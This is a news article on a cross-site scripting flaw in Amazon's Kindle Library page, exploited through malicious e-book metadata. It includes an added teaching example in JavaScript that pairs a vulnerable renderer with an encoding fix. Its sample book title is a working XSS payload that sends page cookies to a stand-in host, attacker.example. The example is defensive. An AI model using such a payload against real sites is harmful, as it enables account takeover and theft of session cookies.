Is YOUR Amazon account at risk? Security expert finds flaw in the Kindle library that could expose personal details



Next time you log into Amazon to manage your Kindle and e-books, you could be putting your personal details at risk.

A German security researcher has spotted a vulnerability in the retail giant's website that hackers could exploit to gain full access to users' accounts.

The flaw, which can be exploited when a user downloads a malicious e-book, has been active since at least July this year, despite being reported to Amazon's security team.


The Kindle flaw was originally discovered by German security expert Benjamin Mussler in October last year and fixed in December. However, when Amazon redesigned its Manage Your Kindle page, earlier this year, the flaw was reintroduced. The vulnerability is exposed if a user downloads a malicious e-book


The flaw was originally discovered by German security expert Benjamin Mussler in October last year, and was subsequently fixed in December.

Everyone who uses Amazon's Kindle Library to store e-books or to deliver them to a Kindle, is potentially at risk, said Mr Mussler. 

WHAT IS CROSS SITE SCRIPTING?

Cross Site Scripting, also known as XSS, is one of the most common web application vulnerabilities. 

It lets hackers inject and run their own scripts in web pages viewed by other users.

In a typical attack, a hacker 'injects' malicious code into a legitimate website, either by tricking the victim into opening a crafted link (reflected XSS) or by getting the site itself to store the code and display it later, as happens here with e-book metadata (stored XSS). 

When the victim's browser loads the affected page, the code is 'executed', which means it carries out whatever task the hacker has set it, with the victim's own logged-in session. 

This can be used to steal login cookies, take over accounts or push malware to devices.

However, he stressed that the users most likely to fall victim to this vulnerability are those who obtain e-books from untrustworthy sources, such as pirate e-book sellers. 

The fix did not last: when Amazon redesigned its Manage Your Kindle page earlier this year, the flaw was reintroduced.

'Amazon's Kindle Library, also known as Manage Your Content and Devices, and Manage your Kindle, is, at the time of writing, vulnerable to Cross-Site Scripting (XSS) attacks,' explained Mr Mussler.

'Malicious code can be injected via e-book metadata.'

Mr Mussler continued that once an attacker manages to add a malicious e-book to a victim's library, the code is executed as soon as the victim opens the Kindle Library web page.

'As a result, Amazon account cookies can be accessed by, and transferred to, the attacker and the victim's Amazon account can be compromised,' added Mr Mussler. 
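The two passages above (the sidebar's description of XSS and Mr Mussler's account of code injected via e-book metadata) describe the same mechanism: a web page that pastes untrusted data into its HTML without encoding it. The following is an added example, not code from the article or from Mr Mussler's report, and it makes no claim about how Amazon's page is actually built. It assumes a simple library listing rendered from a book's title and author fields, a constructed sample library with one booby-trapped title, and a hypothetical collection host `attacker.example`. It shows the vulnerable renderer beside the hardened one and a crude check for tags that did not come from the template.

```javascript
// Added example (not from the article or from Mussler's report): a toy
// "library" page renderer showing how attacker-controlled e-book metadata
// becomes stored XSS, and the output-encoding fix. Field names and the
// attacker URL are assumptions for illustration.

// Constructed sample library: two benign books and one whose title carries
// a payload. The payload is an <img> whose onerror handler sends the page's
// cookies to a hypothetical attacker host.
const SAMPLE_LIBRARY = [
  { title: 'A Tale of Two Cities', author: 'Charles Dickens' },
  { title: 'Dracula', author: 'Bram Stoker' },
  {
    title:
      '<img src=x onerror="new Image().src=' +
      "'https://attacker.example/?c='+encodeURIComponent(document.cookie)\">",
    author: 'Unknown',
  },
];

// HTML-encode the five characters that can change parsing context in
// element content and attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable renderer: metadata is concatenated straight into the markup,
// so a title containing tags is parsed as HTML by the victim's browser.
function renderLibraryVulnerable(books) {
  return (
    '<ul class="library">' +
    books.map((b) => `<li>${b.title} by ${b.author}</li>`).join('') +
    '</ul>'
  );
}

// Hardened renderer: every metadata value is encoded before insertion, so
// the same title is displayed as literal text and nothing executes.
function renderLibrarySafe(books) {
  return (
    '<ul class="library">' +
    books
      .map((b) => `<li>${escapeHtml(b.title)} by ${escapeHtml(b.author)}</li>`)
      .join('') +
    '</ul>'
  );
}

// Crude check used by the demo: does the rendered markup contain a tag that
// did not come from the template? The template only emits <ul> and <li>.
function hasInjectedTag(html) {
  return /<(?!\/?(ul|li)\b)[a-z]/i.test(html);
}

console.log('vulnerable renderer emits injected tag:', hasInjectedTag(renderLibraryVulnerable(SAMPLE_LIBRARY)));
console.log('hardened renderer emits injected tag:  ', hasInjectedTag(renderLibrarySafe(SAMPLE_LIBRARY)));
```

Two practical caveats. Marking the session cookie HttpOnly would stop the `document.cookie` read in the payload, but it would not stop injected script from making authenticated requests in the victim's name, so encoding on output (or a templating engine that does it by default) is the fix, not a cookie flag alone. And the tag check above is only a demo aid; a Content Security Policy that blocks inline event handlers is the browser-side control that would have blunted this particular payload.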

The attack is known as Cross-Site Scripting, or XSS. Once an attacker manages to add the malicious e-book to a victim's library, the code is executed as soon as they open the Kindle Library web page. Amazon account cookies can then be accessed by the attacker and the victim's Amazon account can be compromised


This could potentially expose personal addresses, payment details and order history.


'From the supplier's point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts,' said Mr Mussler.

'Users who stick to e-books sold and delivered by Amazon should be safe.'

Amazon has not yet responded to MailOnline's request for comment.
